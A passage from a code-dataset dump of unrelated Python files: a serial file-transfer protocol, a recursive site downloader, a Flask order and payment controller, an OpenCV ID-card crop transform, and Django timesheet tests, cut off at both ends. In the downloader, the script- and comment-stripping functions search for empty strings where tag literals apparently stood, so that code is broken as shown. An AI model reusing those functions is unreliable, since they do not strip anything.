np.asarray(dets)\n\n from sort import *\n\n tracker = Sort()\n\n tracks = tracker.update(dets)\n\n boxes = []\n indexIDs = []\n c = []\n previous = memory.copy()\n memory = {}\n\n for track in tracks:\n boxes.append([track[0], track[1], track[2], track[3]])\n indexIDs.append(int(track[4]))\n memory[indexIDs[-1]] = boxes[-1]\n\n print(dets)\n print(tracks)\n print(\"box : \",boxes)\n print(\"ID : \",indexIDs)\n print(\"memory : \",memory)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"442248871","text":"import threading\nimport time\nimport sys\nimport serial\nfrom threading import Timer\nimport random\nimport os\n\nCOM_PORT = \"COM30\"\nREAD_FILE_NAME = \"thread_test.py\"\nFTP_HEADER = bytes.fromhex(\"F3 00 5E 01\")\nFTP_END = bytes.fromhex(\"F3 00 5E 01\")\n\nSTORE_FILE_NAME = \"/flash/main.py\"\n# STORE_FILE_NAME = \"/music/Superm.wav\"\n# STORE_FILE_NAME = \"/flash/main.py\"\n# READ_FILE_NAME = \"modnetwork.c\"\n# READ_FILE_NAME = \"main.c\"\n# READ_FILE_NAME = \"32bit_crc_test.txt\"\n# READ_FILE_NAME = \"mb_factory_V11.py\"\nFILE_BLOCK_SIZE = 200\n\nframe_header_str = \"F3\"\nframe_end_str = \"F4\"\nprotocol_id_str = \"01\"\ndev_id_str = \"00\"\nsrv_id_str = \"5E\"\nfile_header_cmd_id_str = \"01\"\nfile_block_cmd_id_str = \"02\"\nfile_state_cmd_id_str = \"F0\"\nfile_type_str = \"88\"\n\nFRAME_HEAD = 0xF3\nFRAME_END = 0xF4\nDEV_ID = 0x00\nSRV_ID = 0x5E\nCMD_STATE_ID = 0xF0\n\nFTP_FSM_HEAD_S = 0\nFTP_FSM_HEAD_CHECK_S = 1\nFTP_FSM_LEN1_S = 2\nFTP_FSM_LEN2_S = 3\nFTP_FSM_DATA_S = 4\nFTP_FSM_CHECK_S = 5\nFTP_FSM_END_S = 6\n\ncondition = threading.Condition()\n\n# ------------------------ start ----------------------------------------------------------\nser = serial.Serial( COM_PORT, 115200 )\n\n# These function input a int variable and return if it can be display\ndef is_display( c ):\n\tif ( 0x20 <= c and c <= 0x7E ):\n\t\treturn True\n\telse:\n\t\treturn False\n\ndef print_bytes_hex( bytes_data ):\n\tprint( \":\".join( \"{:02x}\".format(c) for c in bytes_data ) )\n\ndef bytes_to_hex_str( bytes_data ):\n\treturn \" \".join( \"{:02x}\".format(c) for c in bytes_data )\n\n# data is bytesarray\n# return is int\ndef calc_xor( data ):\n\tret = 0\n\tfor c in data:\n\t\tret = ret ^ c\n\treturn ret\n\ndef calc_add_checksum( data ):\n\tret = 0\n\tfor c in data:\n\t\tret = ret + c\n\treturn ret & 0xFF\n\ndef calc_32bit_xor( data ):\n\tbytes_len = len( data )\n\t# data_bytes = bytes( data, encoding = 'utf-8' )\n\tdata_bytes = bytes( data )\n\t# print_bytes_hex( data_bytes )\n\t# print( bytes_len/4 )\n\t# print( int(bytes_len/4) )\n\tchecksum = bytearray.fromhex( \"00 00 00 00\" )\n\tfor i in range(int(bytes_len/4)):\n\t\tchecksum[0] = checksum[0] ^ data_bytes[i*4 + 0]\n\t\tchecksum[1] = checksum[1] ^ data_bytes[i*4 + 1]\n\t\tchecksum[2] = checksum[2] ^ data_bytes[i*4 + 2]\n\t\tchecksum[3] = checksum[3] ^ data_bytes[i*4 + 3]\n\n\tif ( bytes_len%4 ):\n\t\tfor i in range( bytes_len%4 ):\n\t\t\tchecksum[0+i] = checksum[0+i] ^ data_bytes[4*int(bytes_len/4) + i]\n\n\tprint_bytes_hex( checksum )\n\treturn checksum\n\ndef get_file_len( file_name ):\n\t# read file \n\t# f = open( file_name, 'r' )\n\t# f_d = f.read()\n\t# f_len = len(f_d)\t\n\t# f.close()\n\treturn os.path.getsize( \"./file_name\" )\n\ndef send_task():\n\twhile( True ):\n\t\t#ser.write( \"abcd\".encode('utf-8') )\n\t\t#ser.write( b'\\xF3\\x00\\x01\\x02\\x03\\xff\\xab' )\n\t\t#ser.write( bytes.fromhex(\"F3 00 5E 01\") )\n\t\t#print( \"abcd\".encode('utf-8') )\n\t\t#ser.write( \"abcd\".encode('utf-8') )\n\t\tsend_file( ser, READ_FILE_NAME, 0 )\n\t\t# end_time = time.time()\n\t\t# print( \"Total time : %d second\"%( end_time - start_time ), \"avg tx speed: %d\"% ( get_file_len( READ_FILE_NAME ) ) )\n\t\t# time.sleep(5)\n\t\tbreak\n\ndef send_file( ser, file_name, file_type ):\n\t# read file \n\tf = open( file_name, 'rb' )\n\tf_d = f.read()\n\tf_len = len(f_d)\n\n\t# send file header\n\twhile( True ):\n\t\tcmd_len_str = bytes_to_hex_str( (0x09 + len(STORE_FILE_NAME)).to_bytes( 2, byteorder='little' ) )\n\t\tfile_size_str = bytes_to_hex_str( f_len.to_bytes(4, byteorder='little') )\n\t\tfile_checksum_str = bytes_to_hex_str( calc_32bit_xor( f_d ) )\n\t\tfile_name_str = bytes_to_hex_str( bytes( STORE_FILE_NAME, encoding = 'utf-8' ) )\n\t\tframe_data_str = protocol_id_str + \" \" + dev_id_str + \" \" + srv_id_str + \" \" + file_header_cmd_id_str + \" \" + cmd_len_str + \" \" + file_type_str + \" \" + file_size_str + \" \" + file_checksum_str + \" \" + file_name_str;\n\t\tframe_data_len = len( bytes.fromhex(frame_data_str) )\n\t\tframe_data_len_str = bytes_to_hex_str( (frame_data_len).to_bytes( 2, byteorder='little' ) )\n\t\tframe_head_checkusum_str = bytes_to_hex_str( calc_add_checksum( bytes.fromhex( frame_header_str+frame_data_len_str ) ).to_bytes(1, byteorder='little' ) )\n\t\tframe_checksum_str = bytes_to_hex_str( calc_add_checksum( bytes.fromhex( frame_data_str ) ).to_bytes(1, byteorder='little' ) )\n\t\t\n\t\tsend_head_str = frame_header_str + \" \" + frame_head_checkusum_str + \" \" + frame_data_len_str + \" \" + frame_data_str + \" \" + frame_checksum_str + \" \" + frame_end_str\n\t\tprint( send_head_str )\n\t\t\n\t\tser.write( bytes.fromhex( send_head_str) )\n\t\tcondition.acquire()\n\t\tif ( condition.wait( 5 ) ):\n\t\t\tprint( \"send file header ok\" )\n\t\t\tbreak;\n\t\telse:\n\t\t\tprint( \"send file header err\" )\n\n\t# wait for respond\n\n\t# send file block\n\tstart_time = time.time()\n\tfile_offset = 0\n\twhile ( file_offset < f_len ):\n\t\tprint( \"==== %% %f\"%(100*file_offset/f_len) )\n\t\tif ( (file_offset + FILE_BLOCK_SIZE) < f_len ):\n\t\t\tsend_file_size = FILE_BLOCK_SIZE\n\t\telse:\n\t\t\tsend_file_size = f_len - file_offset\n\n\t\tfile_offset_str = bytes_to_hex_str( file_offset.to_bytes( 4, byteorder='little' ) )\n\t\tcmd_len_str = bytes_to_hex_str( (0x04 + send_file_size).to_bytes( 2, byteorder='little' ) )\n\t\t# file_block_str = bytes_to_hex_str( bytes( f_d[file_offset:file_offset+send_file_size], encoding='utf-8' ) )\n\t\tfile_block_str = bytes_to_hex_str( bytes( f_d[file_offset:file_offset+send_file_size] ) )\n\t\tframe_data_str = protocol_id_str + \" \" + dev_id_str + \" \" + srv_id_str + \" \" + file_block_cmd_id_str + \" \" + cmd_len_str + \" \" + file_offset_str + \" \" + file_block_str;\n\t\tframe_data_len = len( bytes.fromhex(frame_data_str) )\n\t\tframe_data_len_str = bytes_to_hex_str( (frame_data_len).to_bytes( 2, byteorder='little' ) )\n\t\tframe_head_checkusum_str = bytes_to_hex_str( calc_add_checksum( bytes.fromhex( frame_header_str+frame_data_len_str ) ).to_bytes(1, byteorder='little' ) )\n\t\tframe_checksum_str = bytes_to_hex_str( calc_add_checksum( bytes.fromhex( frame_data_str ) ).to_bytes(1, byteorder='little' ) )\n\n\t\tsend_block_str = frame_header_str + \" \" + frame_head_checkusum_str + \" \" + frame_data_len_str + \" \" + frame_data_str + \" \" + frame_checksum_str + \" \" + frame_end_str\n\t\t# print( send_block_str )\n\t\t# random product err\n\t\tsend_block_bytes = bytearray.fromhex( send_block_str);\n\t\t\n\t\t\n\t\t#if ( 5 == random.randint( 1, 10 ) ):\n\t\t#\tprint( \"---->ERR send\" )\n\t\t#\tsend_block_bytes[ random.randint(0, bytes.fromhex(cmd_len_str)[0] + 6) ] += 1\n\n\t\tser.write( send_block_bytes )\n\n\t\tcondition.acquire()\n\t\tif ( condition.wait( 1 ) ):\n\t\t\tfile_offset = file_offset + send_file_size\n\t\telse:\n\t\t\tprint( \"&&&&&&&&&&& Resend a block\" )\n\t\t\ttime.sleep( 5 )\n\t\t\tcontinue\n\t\t\t\n\n\tprint( \"===============================================================================================\" )\n\tprint( \">>>>>> Spend time : %d second\"%( time.time() - start_time ), \"avg tx speed: %d\"% (file_offset/(time.time() - start_time)) )\n\tprint( \">>>>>> Total cnt %d\"%f_len )\n\tprint( \"===============================================================================================\" )\n\n\t# time.sleep( 1 )\n\t# print( \"DTR False >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\" )\n\t# ser.setDTR( False )\n\t# time.sleep( 0.1 )\n\t# print( \"DTR True >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\" )\n\t# ser.setDTR( True )\n\n\tf.close()\n\n# end fo send_file\n\nclass FtpFsm( object ):\n\tdef __init__( self ):\n\t\tself.__state = FTP_FSM_HEAD_S\n\t\tself.__buf = []\n\t\tself.__data_len = 0\n\t\tself.__cur_data_len = 0\n\t\tself.__checksum = 0x00\n\t\tself.__headchecksum = 0x00\n\t\tself.__recv_head_checksum = 0x00\n\n\tdef get_state( self ):\n\t\treturn self.__state\n\n\tdef set_state( self, s ):\n\t\tself.__state = s\n\n\tdef push_char( self, c ):\n\t\tif ( FTP_FSM_HEAD_S == self.__state ):\n\t\t\tif ( FRAME_HEAD == c ):\n\t\t\t\tself.__state = FTP_FSM_HEAD_CHECK_S\n\t\t\t\tself.__buf.clear()\n\t\t\t\tself.__checksum = 0\n\t\t\t\tself.__headchecksum = c\n\n\t\telif ( FTP_FSM_HEAD_CHECK_S == self.__state ):\n\t\t\tself.__recv_head_checksum = c\n\t\t\tself.__state = FTP_FSM_LEN1_S\n\n\t\telif( FTP_FSM_LEN1_S == self.__state ):\n\t\t\tself.__headchecksum += c\n\t\t\tself.__data_len = c\n\t\t\tself.__state = FTP_FSM_LEN2_S\n\n\t\telif( FTP_FSM_LEN2_S == self.__state ):\n\t\t\tself.__headchecksum += c\n\t\t\tif ( self.__headchecksum == self.__recv_head_checksum ):\n\t\t\t\tself.__data_len += c*0xff\n\t\t\t\tself.__state = FTP_FSM_DATA_S\n\t\t\telse:\n\t\t\t\tself.__state = FTP_FSM_HEAD_S\n\n\t\telif( FTP_FSM_DATA_S == self.__state ):\n\t\t\tself.__checksum += c\n\t\t\tself.__buf.append( c )\n\t\t\tif ( len(self.__buf) == self.__data_len ):\n\t\t\t\tself.__state = FTP_FSM_CHECK_S\n\t\t\t\t# print( \"expect checksum %02x\"%(self.__checksum & 0xFF) )\n\n\t\telif( FTP_FSM_CHECK_S == self.__state ):\n\t\t\tif ( (self.__checksum & 0xFF) == c ):\n\t\t\t\tself.__state = FTP_FSM_END_S\n\t\t\telse:\n\t\t\t\tself.__state = FTP_FSM_HEAD_S\n\t\t\t\t\n\t\telif( FTP_FSM_END_S == self.__state ):\n\t\t\tif ( FRAME_END == c ):\n\t\t\t\tself.__state = FTP_FSM_HEAD_S\n\t\t\t\treturn self.__buf\n\t\t\telse:\n\t\t\t\tself.__state = FTP_FSM_HEAD_S \n\n\tdef clear_buf( self ):\n\t\tself.__buf.clear()\n\n\tdef get_buf( self ):\n\t\treturn self.__buf\n\nftp_fsm = FtpFsm()\n\n# clear all the data in serial buffer\ntime.sleep( 1 )\nser.read( ser.inWaiting() )\ntime.sleep( 2 )\nt = threading.Thread(target = send_task)\nt.start()\n\nwhile( True ):\n\tif ( ser.inWaiting() ):\n\t\tr_b = ser.read( ser.inWaiting() )\n\t\tfor c in r_b:\n\t\t\tprint( \"%c\"%(c), end='' )\n\t\t\tbuf_list = ftp_fsm.push_char( c )\n\t\t\tif ( type(buf_list) == list ):\n\t\t\t\tprint( \" #################################### \" )\n\t\t\t\tprint( buf_list )\n\t\t\t\t# protocol id is 0x01 and command status code is 0x00\n\t\t\t\tif ( 0x01 == buf_list[0] and 0x00 == buf_list[6] ):\n\t\t\t\t\tcondition.acquire()\n\t\t\t\t\tcondition.notify( 1 )\n\t\t\t\t\tcondition.release()\n\t\t\t\t\tpass\n\t\t\t\tftp_fsm.clear_buf()\n\t\t\t#if ( is_display(c) ):\n\t\t\t#\tprint( \"%c\"%(c), end='' )\n\t\t\t#else:\n\t\t\t#\tprint( \"%02x\"%(c), end=' ' )\n\nprint( \"***********************************************************************\" )\n\n# t.stop()\n","sub_path":"api_test_script/V1.1_thread_test/comm_protocol.py","file_name":"comm_protocol.py","file_ext":"py","file_size_in_byte":9674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"447032958","text":"from http.client import HTTPConnection, HTTPSConnection\nfrom os import getcwd, makedirs\nfrom os.path import dirname, exists, isdir, isfile\nfrom argparse import ArgumentParser\n\ncwd = getcwd() # We will output to cwd.\nEXCLUDED_EXTS = ['png', 'jpg', 'jpeg', 'gif', 'svg', 'css'] # These won't hold any links.\nbeen_there = []\n\n\ndef seperate(url):\n '''\n :param url: The whole url, for example 'https://www.somedomain.com/index.html'\n :return: A tuple containing the hostname, and the file to GET. For the above example: ('https://www.somedomain.com', '/index.html')\n '''\n parts = url.split('/')\n while '' in parts:\n parts.remove('') # Remove any empty strings.\n return '//'.join(parts[:2]), '/' + '/'.join(\n parts[2:]) # '//'.join(['https:', 'somedomain.com']), '/' + '//'.join(['index.html'])\n\n\ndef read_body(response):\n '''\n :param response: A HTTPResponse object.\n :return: The bytes of the response' body.\n '''\n body = b''\n buff = response.read(50) # Read 50 at a time\n while len(buff) > 0:\n body += buff\n buff = response.read(50)\n return body\n\n\ndef write_to_file(body, get, host):\n '''\n :param body: The bytes to write.\n :param get: The file's path, relative to cwd.\n :return: None\n '''\n host = host.replace('http://', '').replace('https://', '')\n if get == '/':\n get += 'index.html'\n get += '_[file]'\n dir = dirname(cwd + '/' + host + get)\n if not exists(dir):\n makedirs(dir)\n f = open(cwd + '/' + host + get, 'wb')\n f.write(body)\n f.close()\n\n\ndef unjsify(body):\n '''\n :param body: HTML document as a string.\n :return: The HTML document without JS blocks.\n '''\n start = 0\n while True:\n start = body.find('', start) + 1\n start = body.find('', end)\n if start < 0:\n break\n body = body[:end] + body[start:]\n return body\n\n\ndef uglify(body):\n '''\n :param body: HTML document as a string.\n :return: The HTML document without CSS blocks.\n '''\n start = 0\n while True:\n start = body.find('', start) + 1\n start = body.find('', end)\n if start < 0:\n break\n body = body[:end] + body[start:]\n return body\n\n\ndef uncomment(body):\n '''\n :param body: HTML document as a string.\n :return: The HTML document with the comments removed.\n '''\n start = 0\n while True:\n start = body.find('', start)\n body = body[:start] + body[end + 1:]\n start = end\n return body\n\n\ndef parse(body, host):\n body = uncomment(uglify(unjsify(body.decode())))\n result = []\n start = 0\n while True:\n start = body.find('href', start)\n if start < 0:\n break\n end = body.find('\"', start)\n start = body.find('\"', end + 1)\n result.append(body[end + 1:start])\n start = 0\n while True:\n start = body.find('src', start)\n if start < 0:\n break\n end = body.find('\"', start)\n start = body.find('\"', end + 1)\n result.append(body[end + 1:start])\n for i in range(len(result)):\n if '&#' not in result[i] and 'http://' not in result[i] and 'https://' not in result[i]:\n result[i] = host + '/' + result[i]\n return result\n\n\ndef process(response, get, host):\n '''\n :param response: A HTTPResponse object.\n :param get: The asset it was supposed to get.\n :return: A list of links to step into.\n '''\n body = read_body(response)\n write_to_file(body, get, host)\n ext = get.split('.')[::-1][0]\n if ext.lower() in EXCLUDED_EXTS:\n return []\n try:\n return parse(body, host)\n except UnicodeDecodeError:\n return []\n\n\ndef step(url):\n '''\n :param url: The whole url to recoursively GET.\n :return: None\n '''\n if url in been_there:\n return\n been_there.append(url)\n if not '://' in url[0:8]: # Assume http://\n url = 'http://' + url\n host, get = seperate(url)\n print('GETting', get, 'from', host)\n con = HTTPSConnection(host[8:], timeout=10) if host[0:5] == 'https' else HTTPConnection(host[7:],\n timeout=10) # Make the connection\n try:\n con.request('GET', get)\n except:\n print('Unable to GET', get)\n return\n response = con.getresponse()\n for result in process(response, get, host):\n step(result)\n\nparser = ArgumentParser()\nparser.add_argument('url', help='The URL to start from')\nparser.add_argument('-o', '--output', help='The directory to output to')\nargs = parser.parse_args()\n\nif args.output:\n cwd = args.output\nstep(args.url)","sub_path":"slither.py","file_name":"slither.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"324154681","text":"import os\nimport pickle\nfrom redis import Redis\nfrom rq import Queue, Worker\nimport click\nfrom flask.cli import with_appcontext\nfrom inf5190.services import perform_request, ApiError\nfrom inf5190.model.productModel import Product\nfrom inf5190.model.orderModel import Order\nfrom inf5190.model.productOrderModel import ProductOrder\nfrom inf5190.model.shippingInfoModel import ShippingInformation\nfrom inf5190.model.creditCardModel import CreditCard\nfrom inf5190.model.transactionModel import Transaction\nfrom inf5190.view import views\n\nredis_url = os.environ.get('REDIS_URL', 'redis://localhost')\nredis_conn = Redis.from_url(redis_url)\nqueue = Queue(connection=redis_conn)\n\n\nclass OrderController:\n @classmethod\n def formatted_order(cls, order_id):\n cle = f\"order-{order_id}\"\n order_cached = redis_conn.get(cle)\n if order_cached:\n order_json = pickle.loads(order_cached)\n else:\n order_json = get_order_products(order_id)\n \n return views.display_order(order_json)\n \n @classmethod\n def create_order(cls, post_data):\n if \"product\" in post_data and \"id\" in post_data[\"product\"] and \"quantity\" in post_data[\"product\"] \\\n and isinstance(post_data[\"product\"][\"id\"], int) and isinstance(post_data[\"product\"][\"quantity\"], int) \\\n and post_data[\"product\"][\"quantity\"] > 0:\n \n product_id = post_data[\"product\"][\"id\"]\n quantity = post_data[\"product\"][\"quantity\"]\n product = Product.get_or_none(Product.id == product_id)\n \n if not product or not product.in_stock:\n return views.display_error_out_of_inventory()\n \n price = product.price\n weight = product.weight\n total_price = price * quantity\n if weight < 500.0:\n shipping_price = 5\n elif weight < 2000.0:\n shipping_price = 10\n else:\n shipping_price = 25\n \n order = Order.create(total_price=total_price, shipping_price=shipping_price, paid=False, in_progress=False)\n ProductOrder.create(product_id=product_id, order_id=order.id, quantity=quantity)\n \n return views.display_post_redirect(order.id)\n \n elif \"products\" in post_data:\n total_price = 0\n shipping_price = 0\n product_list_id = []\n \n for product_item in post_data[\"products\"]:\n if \"id\" in product_item and \"quantity\" in product_item and isinstance(product_item[\"id\"], int) \\\n and isinstance(product_item[\"quantity\"], int) and product_item[\"quantity\"] > 0:\n \n product_id = product_item[\"id\"]\n quantity = product_item[\"quantity\"]\n product = Product.get_or_none(Product.id == product_id)\n \n if not product or not product.in_stock:\n return views.display_error_out_of_inventory()\n \n price = product.price\n weight = product.weight\n total_price += price * quantity\n if weight < 500.0:\n shipping_price += 5\n elif weight < 2000.0:\n shipping_price += 10\n else:\n shipping_price += 25\n \n p_id = ProductOrder.create(product_id=product_id, quantity=quantity)\n product_list_id.append(p_id)\n \n else:\n return views.display_error_missing_fields_product()\n \n order = Order.create(total_price=total_price, shipping_price=shipping_price, paid=False, in_progress=False)\n for product_item_id in product_list_id:\n ProductOrder.update(order=order.id).where(ProductOrder.id == product_item_id).execute()\n \n return views.display_post_redirect(order.id)\n \n else:\n return views.display_error_missing_fields_product()\n \n @classmethod\n def update_order(cls, post_data, order_id):\n order = Order.get_or_none(Order.id == order_id)\n if not order.in_progress:\n if \"credit_card\" in post_data:\n return cls.update_credit_card(post_data, order_id)\n else:\n return cls.update_shipping_info(post_data, order_id)\n else:\n return views.display_order_standby_conflict()\n \n @staticmethod\n def update_shipping_info(post_data, order_id):\n if \"order\" in post_data and \"email\" in post_data[\"order\"] and \"shipping_information\" in post_data[\"order\"] \\\n and \"country\" in post_data[\"order\"][\"shipping_information\"] \\\n and \"address\" in post_data[\"order\"][\"shipping_information\"] \\\n and \"postal_code\" in post_data[\"order\"][\"shipping_information\"] \\\n and \"city\" in post_data[\"order\"][\"shipping_information\"] \\\n and \"province\" in post_data[\"order\"][\"shipping_information\"]:\n \n email = post_data[\"order\"][\"email\"]\n country = post_data[\"order\"][\"shipping_information\"][\"country\"]\n address = post_data[\"order\"][\"shipping_information\"][\"address\"]\n postal_code = post_data[\"order\"][\"shipping_information\"][\"postal_code\"]\n city = post_data[\"order\"][\"shipping_information\"][\"city\"]\n province = post_data[\"order\"][\"shipping_information\"][\"province\"]\n shipping_information = ShippingInformation.create(country=country, address=address,\n postal_code=postal_code,\n city=city, province=province)\n Order.update(email=email,\n shipping_information=shipping_information.id).where(Order.id == order_id).execute()\n return views.display_ok()\n \n else:\n return views.display_error_missing_fields_order()\n \n @staticmethod\n def update_credit_card(post_data, order_id):\n order = Order.get_or_none(Order.id == order_id)\n \n if not order.shipping_information:\n return views.display_error_missing_shipping_info()\n \n if \"credit_card\" in post_data and \"name\" in post_data[\"credit_card\"] and \"number\" in post_data[\"credit_card\"] \\\n and \"expiration_year\" in post_data[\"credit_card\"] and \"cvv\" in post_data[\"credit_card\"] \\\n and \"expiration_month\" in post_data[\"credit_card\"]:\n \n if order.paid:\n return views.display_error_already_paid()\n \n name = post_data[\"credit_card\"][\"name\"]\n number = post_data[\"credit_card\"][\"number\"]\n expiration_month = post_data[\"credit_card\"][\"expiration_month\"]\n expiration_year = post_data[\"credit_card\"][\"expiration_year\"]\n cvv = post_data[\"credit_card\"][\"cvv\"]\n \n payment_data = {\n \"credit_card\": {\n \"name\": name,\n \"number\": number,\n \"expiration_year\": expiration_year,\n \"cvv\": cvv,\n \"expiration_month\": expiration_month\n },\n \"amount_charged\": order.total_price + order.shipping_price\n }\n\n Order.update(in_progress=True).where(Order.id == order_id).execute()\n queue.enqueue(pay_order, order_id, payment_data)\n return views.display_order_standby()\n \n else:\n return views.display_error_missing_fields_order()\n\n\ndef get_order_products(order_id):\n order = Order.get_or_none(Order.id == order_id)\n product_list = []\n query = ProductOrder.select().join(Order).where(ProductOrder.order_id == order_id).execute()\n for product_order in query:\n product = {\"id\": product_order.product_id, \"quantity\": product_order.quantity}\n product_list.append(product)\n return views.get_order_json(order, product_list)\n\n\ndef pay_order(order_id, payment_data):\n try:\n payment_response = perform_request(uri=\"pay\", method=\"POST\", data=payment_data)\n credit_card = CreditCard.create(name=payment_response[\"credit_card\"][\"name\"],\n first_digits=payment_response[\"credit_card\"][\"first_digits\"],\n last_digits=payment_response[\"credit_card\"][\"last_digits\"],\n expiration_year=payment_response[\"credit_card\"][\"expiration_year\"],\n expiration_month=payment_response[\"credit_card\"][\"expiration_month\"])\n transaction = Transaction.create(code=payment_response[\"transaction\"][\"id\"],\n success=payment_response[\"transaction\"][\"success\"],\n amount_charged=payment_response[\"transaction\"][\"amount_charged\"])\n Order.update(credit_card=credit_card.id,\n transaction=transaction.id, paid=True, in_progress=False).where(Order.id == order_id).execute()\n\n order_json = get_order_products(order_id)\n redis_conn.set(f\"order-{order_id}\", pickle.dumps(order_json), ex=86400)\n \n except ApiError as error:\n transaction = Transaction.create(success=False,\n amount_charged=payment_data[\"amount_charged\"],\n error_code=error.code, error_name=error.name)\n Order.update(transaction=transaction.id, paid=False, in_progress=False).where(Order.id == order_id).execute()\n\n\n@click.command(\"worker\")\n@with_appcontext\ndef rq_worker():\n worker = Worker([queue], connection=redis_conn)\n worker.work()\n","sub_path":"inf5190/controller/orderController.py","file_name":"orderController.py","file_ext":"py","file_size_in_byte":10009,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"358481026","text":"import numpy as np\nimport imutils\nimport cv2\nimport glob\n\nimages = [cv2.imread(file,0) for file in glob.glob(\"out/*.png\")]\n\n#img = cv2.imread(\"out5.png\",0)\ncounter = 0\nfor img in images:\n\theight, width = img.shape[:2]\n\tres = cv2.resize(img,(3*width, 3*height), interpolation= cv2.INTER_LINEAR )\n\n\tkernel = np.ones((2,2),np.float32)\n\tret,thresh1 = cv2.threshold(res,100,255,cv2.THRESH_BINARY)\n\timg = cv2.bitwise_not(thresh1)\n\tclosing = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n\n\tnama = 'hasil%d' % (counter)\n\tcounter += 1\n\tcv2.imwrite(\"out/ktp/transform/\"+nama+\".png\",closing)\n\tcv2.imshow(\"th3\", closing)\n\tcv2.waitKey(0)","sub_path":"support/cropping_data/transform_nik_nama.py","file_name":"transform_nik_nama.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"395622448","text":"#\n# QuarterApp - A time tracker for common people.\n#\n# Copyright 2015-2018 The QuarterApp Team\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport datetime\n\nfrom django.core.validators import EMPTY_VALUES\nfrom django.db import IntegrityError\nfrom django.test import TestCase\nfrom django.utils.encoding import force_text\n\nfrom . import factories\nfrom ..models import Timesheet, OffsetError, Quarter\nfrom ...accounts.tests import factories as account_factories\nfrom ...accounts.tests.test_mixins import CreateTestUserMixin\nfrom ...core.tests import factories as core_factories\n\n\ndef datetime_from_now(days=0):\n now = datetime.datetime.now()\n return now + datetime.timedelta(days=days)\n\n\ndef date_from_now(days=0):\n return datetime_from_now(days=days).date()\n\n\nclass TimesheetTests(CreateTestUserMixin, TestCase):\n def setUp(self):\n super(TimesheetTests, self).setUp()\n self.project = core_factories.create_project(self.user)\n self.activity = core_factories.create_activity(self.project)\n self.activity2 = core_factories.create_activity(self.project)\n self.project2 = core_factories.create_project(self.user)\n self.activity3 = core_factories.create_activity(self.project2)\n self.timesheet = factories.create_timesheet(self.user)\n\n def test_create_duplicate_timesheets(self):\n self.assertRaises(\n IntegrityError, factories.create_timesheet, user=self.user)\n\n def test_owner_and_user(self):\n self.assertEqual(self.user.owner_object, self.timesheet.owner)\n self.assertEqual(self.user, self.timesheet.user)\n\n def test_multiple_timesheets(self):\n days = [1, 2, 3, 4, 5, 6, 7]\n result = [self.timesheet]\n for day_delta in days:\n date = date_from_now(days=day_delta)\n result.append(factories.create_timesheet(self.user, date=date))\n\n timesheets = Timesheet.objects.all()\n self.assertSequenceEqual(timesheets, result)\n\n def test_timesheet_should_have_zero_hours(self):\n ts = Timesheet()\n self.assertEqual(0, ts.total_hours)\n\n def test_registration_require_activity(self):\n with self.assertRaises(ValueError):\n self.timesheet.register(offset=0, count=12, activity=None)\n\n def test_timesheet_can_register_time(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.assertEqual(3, self.timesheet.total_hours)\n\n def test_timesheet_cannot_register_negative_offset(self):\n ts = Timesheet()\n with self.assertRaises(OffsetError):\n ts.register(offset=-12, count=12, activity=self.activity)\n\n def test_timesheet_cannot_register_more_than_96_quarters(self):\n ts = Timesheet()\n with self.assertRaises(OffsetError):\n ts.register(offset=97, count=12, activity=self.activity)\n\n def test_timesheet_cannot_go_out_of_bounds(self):\n self.timesheet.register(offset=90, count=6, activity=self.activity)\n with self.assertRaises(OffsetError):\n self.timesheet.register(offset=90, count=17,\n activity=self.activity)\n\n def test_timesheet_can_be_reset(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.timesheet.reset()\n\n self.assertEqual(0, self.timesheet.total_hours)\n\n def test_multiple_activities_can_be_registered(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.timesheet.register(offset=20, count=16, activity=self.activity2)\n\n self.assertEqual(7, self.timesheet.total_hours)\n\n def test_timesheet_user_cannot_register_others_activities(self):\n # TODO\n pass\n\n def test_registrations_can_be_overwritten(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.timesheet.register(offset=4, count=16, activity=self.activity2)\n\n self.assertEqual(5, self.timesheet.total_hours)\n\n def test_timesheet_usage_is_empty_by_default(self):\n self.assertIsNotNone(self.timesheet.usage)\n self.assertEqual(0, self.timesheet.usage.total)\n\n def test_usage_for_single_activity(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.assertEqual(3.0, self.timesheet.usage.total)\n\n def test_timesheet_summary_contains_single_project(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.assertEqual(1, len(self.timesheet.usage.projects))\n\n def test_project_usage_is_sorted_on_total(self):\n self.timesheet.register(offset=0, count=12, activity=self.activity)\n self.timesheet.register(offset=22, count=16, activity=self.activity2)\n self.timesheet.register(offset=40, count=40, activity=self.activity3)\n\n self.assertEqual(10.0, self.timesheet.usage.projects[0].total)\n self.assertEqual(\n self.project2, self.timesheet.usage.projects[0].project)\n self.assertEqual(\n 7.0, self.timesheet.usage.projects[1].total)\n self.assertEqual(\n self.project, self.timesheet.usage.projects[1].project)\n\n def test_usage_filters_on_owner(self):\n other_user = account_factories.create_standard_user(\n username=account_factories.random_string(),\n password=account_factories.random_string())\n other_project = 